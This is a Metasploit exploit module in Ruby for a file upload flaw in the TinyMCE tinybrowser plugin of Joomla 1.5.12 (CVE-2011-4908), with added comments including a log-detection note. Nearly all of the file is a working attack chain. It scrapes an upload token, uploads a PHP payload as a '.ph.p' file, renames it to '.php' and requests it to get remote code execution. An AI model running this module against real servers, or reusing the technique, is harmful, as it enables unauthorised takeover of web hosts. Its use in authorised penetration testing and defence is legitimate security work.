##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Module metadata. The affected component is the TinyMCE "tinybrowser"
  # plugin bundled with Joomla 1.5.12 (see the CVE/OSVDB/EDB references
  # below); the payload is PHP and the only module option is URI, the
  # Joomla base path.
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Joomla 1.5.12 TinyBrowser File Upload Code Execution',
      'Description' => %q{
        This module exploits a vulnerability in the TinyMCE/tinybrowser plugin.
        This plugin is not secured in version 1.5.12 of joomla and allows the upload
        of files on the remote server.
        By renaming the uploaded file this vulnerability can be used to upload/execute
        code on the affected system.
      },
      'Author' => [ 'spinbad <spinbad.security[at]googlemail.com>' ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2011-4908'],
          ['OSVDB', '64578'],
          ['EDB', '9296'],
          ['URL', 'http://developer.joomla.org/security/news/301-20090722-core-file-upload.html'],
        ],
      'Privileged' => false,
      'Payload' =>
        {
          'DisableNops' => true,
          'Compat' =>
            {
              'ConnectionType' => 'find',
            },
          'Space' => 1024,
        },
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'Targets' => [[ 'Automatic', { }]],
      'DisclosureDate' => '2009-07-22',
      'DefaultTarget' => 0))

    register_options(
      [
        # Base path of the Joomla install; every request below is built under it.
        OptString.new('URI', [true, "Joomla directory path", "/"]),
      ])
  end

  # Vulnerability check: fetches tinybrowser's upload.php page under the
  # configured Joomla path and looks for "flexupload.swf" in the body.
  # Only the presence of the plugin page is confirmed (no version check),
  # which is why the positive result is Appears rather than Vulnerable.
  #
  # @return [Exploit::CheckCode] Appears when the marker is found, Safe
  #   otherwise (including when no response is received at all)
  def check
    uri = normalize_uri(datastore['URI'], 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php')
    uri << '?type=file&folder='
    # 25 is the read timeout (seconds) handed to send_request_raw
    res = send_request_raw(
      {
        'uri' => uri
      }, 25)

    if (res and res.body =~ /flexupload.swf/)
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end


  # Unused stub: it has no body and is never called in this file (the
  # obfuscation token is parsed inline in #exploit), so it returns nil.
  def retrieve_obfuscation()

  end


  # Exploit flow, all under <URI>/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser:
  #   1. GET  upload.php?type=file&folder=             -> scrape the "obfus" token
  #   2. POST upload_file.php (multipart)               -> upload <random>.ph.p into /images/stories/
  #   3. GET  upload_process.php?...&filetotal=1        -> complete the upload
  #   4. POST edit.php?type=file&folder= (action=rename) -> rename .ph.p to .php
  #   5. GET  <URI>/images/stories/<random>.php         -> call the payload
  # Detection note: this sequence is distinctive in web-server logs: a hit on
  # tinybrowser's upload_file.php, then edit.php with action=rename, then a
  # request for a newly created .php file under /images/stories/.
  # Failures are reported via print_error; only a missing obfuscation token
  # stops the flow, the later steps are attempted regardless of the
  # previous step's result.
  #
  # @return [nil]
  def exploit

    # Wrap the encoded PHP payload in PHP tags; this is the file body uploaded below.
    cmd_php = '<?php ' + payload.encoded + '?>'

    # Generate some random strings
    cmdscript = rand_text_alpha_lower(20)
    boundary = rand_text_alphanumeric(6)

    # Static files
    directory = '/images/stories/'
    uri_base = normalize_uri(datastore['URI'])
    # Ensure exactly one trailing slash before appending the plugin path.
    uri_base << '/' if uri_base[-1,1] != '/'
    uri_base << 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser'

    # Get obfuscation code (needed to upload files)
    obfuscation_code = nil

    res = send_request_raw({
      'uri' => uri_base + '/upload.php?type=file&folder='
    }, 25)

    # NOTE: when no response comes back at all, obfuscation_code stays nil and
    # the upload below is still sent with an empty obfuscate= parameter.
    if (res)

      # $1 is the full token captured by the outer group ((\w)+).
      if(res.body =~ /"obfus", "((\w)+)"\)/)
        obfuscation_code = $1
        print_good("Successfully retrieved obfuscation code: #{obfuscation_code}")
      else
        print_error("Error retrieving obfuscation code!")
        return
      end
    end



    # Upload shellcode (file ending .ph.p)
    # Hand-built multipart body with two parts: "Filename" and "Filedata".
    data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\n"
    data << "#{cmdscript}.ph.p\r\n--#{boundary}"
    data << "\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"#{cmdscript}.ph.p\"\r\n"
    data << "Content-Type: application/octet-stream\r\n\r\n"
    data << cmd_php
    data << "\r\n--#{boundary}--"

    res = send_request_raw({
      'uri' => uri_base + "/upload_file.php?folder=" + directory + "&type=file&feid=&obfuscate=#{obfuscation_code}&sessidpass=",
      'method' => 'POST',
      'data' => data,
      'headers' =>
        {
          # String#length is a character count; it equals the byte count only while data is ASCII.
          'Content-Length' => data.length,
          'Content-Type' => 'multipart/form-data; boundary=' + boundary,
        }
    }, 25)

    # Upload failure is only reported; the rename and payload call still follow.
    if (res and res.body =~ /File Upload Success/)
      print_good("Successfully Uploaded #{cmdscript}.ph.p")
    else
      print_error("Error uploading #{cmdscript}.ph.p")
    end


    # Complete the upload process (rename file)
    # NOTE(review): the message says ".ph.p_" but the file was uploaded as
    # ".ph.p"; this looks like a typo in the status text, not a file name.
    print_status("Renaming file from #{cmdscript}.ph.p_ to #{cmdscript}.ph.p")
    # No timeout argument here (library default applies); the response is not inspected.
    res = send_request_raw({
      'uri' => uri_base + '/upload_process.php?folder=' + directory + '&type=file&feid=&filetotal=1'
    })


    # Rename the file from .ph.p to .php
    # Posts tinybrowser's rename form: actionfile/renamefile/renameext name the
    # source file, the new base name and the new extension; the remaining
    # fields are the other form values sent with the same request.
    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => uri_base + '/edit.php?type=file&folder=',
        'vars_post' =>
          {
            'actionfile[0]' => "#{cmdscript}.ph.p",
            'renameext[0]' => 'p',
            'renamefile[0]' => "#{cmdscript}.ph",
            'sortby' => 'name',
            'sorttype' => 'asc',
            'showpage' => '0',
            'action' => 'rename',
            'commit' => '',
          }
      }, 10)

    # The unescaped "." in the pattern matches any character, not just a literal dot.
    if (res and res.body =~ /successfully renamed./)
      print_status("Renamed #{cmdscript}.ph.p to #{cmdscript}.php")
    else
      print_error("Failed to rename #{cmdscript}.ph.p to #{cmdscript}.php")
    end


    # Finally call the payload
    print_status("Calling payload: #{cmdscript}.php")
    uri = normalize_uri(datastore['URI'])
    uri << '/' if uri[-1,1] != '/'
    uri << directory + cmdscript + ".php"
    # Response is intentionally unused; the request itself runs the uploaded file.
    res = send_request_raw({
      'uri' => uri
    }, 25)

  end
end